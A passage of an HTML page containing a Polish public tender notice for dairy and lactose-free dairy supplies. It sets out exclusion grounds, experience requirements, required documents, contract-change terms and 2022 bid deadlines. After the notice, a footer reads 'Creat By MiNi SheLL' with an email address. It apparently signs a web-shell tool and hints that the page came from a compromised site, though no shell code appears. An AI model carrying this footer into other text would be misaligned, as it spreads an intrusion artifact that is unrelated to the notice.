mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał<br/>a w przypadku świadczeń powtarzających się lub ciągłych wykonuje co najmniej 1 zadanie polegające na dostawie<br/>asortymentu dotyczącego poszczególnych części:<br/>Część 1 zamówienia: Artykuły mleczarskie o wartości 20 000,00 zł<br/>Część 2 zamówienia: Artykuły mleczarskie bez laktozy o wartości 20 000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>9.2.1 potwierdzających brak podstaw wykluczenia:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.),<br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>b) o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wg Załącznika nr 4;<br/>c) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (Zamawiający pobierze samodzielnie z<br/>ogólnodostępnych rejestrów Wykonawca nie musi załączać do dokumentów na wezwanie)<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego<br/>Rejestru Sądowego lub<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej– składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/>nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury.<br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>d) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust 1 pkt 1 i 2 ustawy Pzp<br/>b) art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne.<br/>c) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e) art. 109 ust. 1 pkt 4 ustawy Pzp<br/>f) art. 7 ust 1 ustawy z 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (tj. Dz.U. 2022 r. poz. 835) oraz Rozporządzenia Rady (WE) nr 765/2006 z<br/>dnia 18 maja 2006 dotyczącego środków ograniczających w związku z sytuacją na Białorusi oraz udziałem Białorusi w agresji Rosji<br/>wobec Ukrainy (tj. Dz. U.UE.L.2006.134.1 z 20.05.2006 z późn. zm.) - wg załącznika 9 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">potwierdzających spełnianie warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (doświadczenie,<br/>kwalifikacje zawodowe kadry technicznej):<br/>a) wykazu doświadczenia; wykaz wykonanych dostaw w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na<br/>rzecz których dostawy zostały wykonane wraz z załączeniem dowodów określających czy zostały wykonane należycie, przy czym<br/>dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane,<br/>a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy,<br/>w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>wykonywanie usług powinny być wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert. załącznik nr 3.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca załącza również:<br/>a) pełnomocnictwo:<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, podpisem osobistym lub kwalifikowanym podpisem elektronicznym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązania są do ustanowienia pełnomocnika. Dokument pełnomocnictwa z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty<br/>ipowinno zawierać w szczególności wskazanie:- postępowania o zamówienie publiczne, którego<br/>dotyczy,- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego pełnomocnika oraz<br/>zakresu jego umocowania. Wymagana forma:Pełnomocnictwo powinno zostać złożone w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym<br/>lub kwalifikowanym podpisem elektronicznym. Dopuszcza się również<br/>przedłożenieelektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez<br/>notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej<br/>uprawnienia notariusza.b) zobowiązanie podmiotu trzeciego do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku gdy<br/>Wykonawca, w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ,<br/>będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów.Zobowiązanie<br/>podmiotuudostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdza, że<br/>stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:- zakres dostępnych wykonawcy<br/>zasobów podmiotu udostępniającego zasoby;- sposób i okres udostępnienia wykonawcy i<br/>wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywani<br/>zamówienia;- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub<br/>usługi, których wskazane zdolności dotyczą.Wymagana forma:Zobowiązanie musi być złożone<br/>w formie elektronicznej lubw postaci elektronicznej opatrzonej podpisem zaufanym, podpisem<br/>osobistym lub kwalifikowany podpisem elektrycznym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W trakcie obowiązywania umowy Strony dopuszczają:<br/>1.1 Zmiana Przedmiotu Umowy w zakresie asortymentu zaoferowanych produktów w przypadku:<br/>a) zaprzestania wytwarzania produktu objętego umową, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości,<br/>za cenę nie wyższa niż cena produktu objętego umową.<br/>b) wprowadzenie do sprzedaży przez producenta zmodyfikowanego/udoskonalonego produktu powodującego wycofanie<br/>dotychczasowego, za cenę nie wyższa niż cena produktu objętego umowa.<br/>c) zmiany nazwy produktu, wielkości opakowania przy zachowaniu jego parametrów- w przypadku wprowadzenia<br/>niniejszych zmian przez producenta, potwierdzonych odpowiednimi dokumentami.<br/>1.2 Zmiana terminu realizacji umowy - w przypadku innych przyczyn zewnętrzne niezależne od Zamawiającego oraz<br/>Wykonawcy skutkujące brakiem możliwości prowadzenia dostaw lub wykonywania innych czynności przewidzianych umowa, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie.<br/>1.3 Zmiany w zakresie płatności:<br/>a) zmiana ostatecznego wynagrodzenia Wykonawcy wynikająca z ewentualnej różnicy między ilością planowanych ilości<br/>asortymentu a rzeczywistymi ilościami wynikającymi z bieżących potrzeb - wynagrodzenie Wykonawcy zostanie wyliczone<br/>według rzeczywistej ilości zamawianego asortymentu w oparciu o zaoferowane ceny jednostkowe towaru,<br/>b) zmiana obowiązującej stawki VAT- wartość należnego wynagrodzenia zostanie skorygowana o wartość należnego<br/>podatku poprzez dodanie do wartości netto wartości należnego podatku VAT, zgodnie z obowiązującymi w tym zakresie<br/>przepisami prawa,<br/>c) zmiana terminów płatności wynikająca z wszelkich uzasadnionych (koniecznych) zmian wprowadzanych do umowy.<br/>2. Niewykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup niezrealizowanej ilości towaru w okresie<br/>obowiązywania umowy.<br/>3. Zmiany w zakresie ilości zamawianych produktów. Zamawiający zastrzega, że podane ilości artykułów są ilościami<br/>szacunkowymi i mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość poszczególnych artykułów będzie wynikała z<br/>faktycznych potrzeb Zamawiającego.<br/>4. Nie wymagają zmiany umowy w formie aneksu okoliczności o których mowa w § 10 ust. 1 pkt. 1.1 Umowy - z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.<br/>5. Zmiany określone w §10 ust. 1 pkt. 1.1 Umowy następują w formie wniosku Wykonawcy i akceptacji Zamawiającego,<br/>która może zostać wyrażona w formie elektronicznej przez osoby wskazane w § 4 ust. 10 Umowy.<br/>6. Zmiany niniejszej umowy określone w §10 ust. 1 pkt. 1.2 i pkt.1.3 Umowy wymagają zawarcia aneksu w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://dpskrzyzanowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-30 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com